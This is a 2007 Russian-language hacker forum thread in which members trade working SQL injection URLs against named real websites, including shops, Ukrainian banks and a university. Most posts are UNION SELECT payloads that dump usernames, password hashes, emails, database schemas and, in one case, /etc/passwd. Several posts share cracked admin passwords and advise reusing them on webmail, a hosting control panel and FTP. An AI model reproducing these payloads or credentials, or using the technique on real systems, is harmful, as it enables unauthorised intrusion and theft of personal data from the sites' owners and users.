SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Code:
    http://www.cybersquads.ru/articles/categories.php?arttype=-1'+union+select+1,2,3,4,5,6,7,8,concat(name,'%20:%20',password,'%20:%20',email,'%20:%20',icq,'%20:%20',homepage),10,11,12,13+from+users+limit+100/*
     
  2. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,concat(uname,0x3a,pass),4,5,6,7,8,9+from+users+limit+1,1/*
    логин:пасс
     
    4 people like this.
  3. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Code:
    http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=1'
    Подробности ошибки не выдает :(
     
    1 person likes this.
  4. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://b-s.com.ua/cgi-bin/catalog.pl?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12+from+zakaz/*
    to Joker-jar

    Code:
    http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,concat(database(),char(58),user(),Char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17/*
     
    #1464 Grey, 30 Mar 2007
    Last edited: 30 Mar 2007
  5. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    2 Grey & Joker-jar
    Code:
    http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+gorod_users/*
    с именами столбцов, думаю, вы разберетесь
     
    3 people like this.
  6. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.2msk.ru/?module=food&id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17/*
     
    1 person likes this.
  7. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    admin:dbcc4a47bc32b0e84903c632fb0dc08c => admin:lackawanna
    root:54a43983056d0aa5 => root:f00bar
    Админка - /admin. Залогиниться не могу ((

    Идем дальше:
    mcpost:242d048c07a9cbb3c0f8895019cd9253 => mcpost:489hbc
    Админку найти не могу((

    И спам листы если кому нужны:
    __:)__
     
  8. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    можно в webmail зайти
    Code:
    http://www.mcpost.com/webmail
    а можно и в Control Panel хостера)
    Code:
    https://mmm2624.sbc-webhosting.com/cgi-bin/authApp?msg=LOGIN&redirect=/cgi-bin/secure/index
    логин/пасс те же
     
    #1468 n1†R0x, 30 Mar 2007
    Last edited: 30 Mar 2007
    1 person likes this.
  9. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    + ftp
    Code:
    ftp://mcpost:[email protected]
    +++++
    Code:
    http://www.sader.org.tr/uyeler_detay.asp?id=2189768%20union%20select%200,ad,2,email,url,resim,firma,unvan,8,adres,telefon,fax,12,13,14,15,16,17%20from%20uyeler%20where%20id=[B]ID[/B]
    меняем ID и инфо.
    панели нетy или вроде ето только Members
     
    #1469 Muhacir, 30 Mar 2007
    Last edited: 30 Mar 2007
    1 person likes this.
  10. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    Code:
    http://www.hurriyetusa.com/haber/haber_detay.asp?id=973068465%20union%20select%200,1,2,3,4,5,6,7,8%20from%20admin
    Help

    Code:
    http://www.panasonic.com.tr/urun_detay.asp?proid=633'%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20users
    помогите со 2 ым :)
     
    #1470 Muhacir, 30 Mar 2007
    Last edited: 30 Mar 2007
  11. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Т.к. скуля выводит все записи (все строки), то там где много ограничил её лимитом с 0 по 15 запись:

    Code:
    http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version())/*
    http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+0,15/*
    
    http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(110,101,117,95,117,115,101,114,115)/*
    http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(id,char(58),login,char(58),password,char(58),name,char(58),email)+from+bers.neu_users/*
    
    http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(97,100,109,105,110,115)+limit+0,15/*

    Code:
    http://www.istrodina.com/rodina_articul.php3?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14/*
     
    #1471 Grey, 30 Mar 2007
    Last edited: 30 Mar 2007
    1 person likes this.
  12. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    <noindex>
    www.diamantbank.ua


    Code:
    http://www.diamantbank.ua/?el_id=-1+union+select+passwd+from+users/*
    </noindex>
     
    4 people like this.
  13. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Очень давно выкладывал, но то была просто скуля без запроса...

    *****

    Вот тут дальше не продвинулся, если кто будет смотреть - отпишитесь че да как...

     
    #1473 Fr-Ron, 30 Mar 2007
    Last edited: 30 Mar 2007
    1 person likes this.
  14. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Давненько не выкладывал =(
    Code:
    http://www.simpleprinciples.com/main/main.html?Id=7+union+select+1,2,3,4,concat_ws(char(58),version(),database(),user())/*
     
    8 people like this.
  15. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Shoping
    Code:
    http://www.10dance.it/shop/pagine.php?id=-9+union+select+1,user(),3,4/*
    Code:
    http://www.euroinf.it/shop/shop.php?id=-86+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),5,6,7,8/*
    Code:
    http://shop.colinmcraesport.com/item.php?id=-8+union+select+1,2,3,4,5,6,LOAD_FILE(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
    Code:
    http://www.kbmedien.ch/shop/bestellform.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
    Code:
    http://www.vlp-aspan.ch/de/shop/category.php?id=-6+union+select+concat(user_password,0x3a,user_name)+from+users+limit+13,1/*
    перебор юзеров лимитом
     
    4 people like this.
  16. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.ukma.kiev.ua

    Национальный Университет Киево-Могилянской Академии


    падлюки, не взяли меня =( пусть терь локти грызут :)

    Code:
    http://www.ukma.kiev.ua/news/news_detailed.php?id=-1+union+select+1,2,3,concat(username,char(58),user_password),5,6,7,8,9,10,11,12,13,14,15,16+from+phpbb_users/*
     
    2 people like this.
  17. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.ukrinfo.net/s.p?g=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
    http://www.ukrinfo.net/s.p?g=-1+union+select+table_name+from+information_schema.tables+limit+17,1/*
    http://www.ukrinfo.net/s.p?g=-1+union+select+concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(65,100,109,105,110)+limit+0,1/*
    http://www.ukrinfo.net/s.p?g=-1+union+select+concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(99,111,110,116,114,111,108)+limit+0,1/*
     
    2 people like this.
  18. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    0_o
    upd
     
    #1478 Spyder, 30 Mar 2007
    Last edited: 30 Mar 2007
    3 people like this.
  19. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.avtozazbank.com


    Code:
    http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*
     
    1 person likes this.
  20. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    2Ksander
     
Thread Status:
Not open for further replies.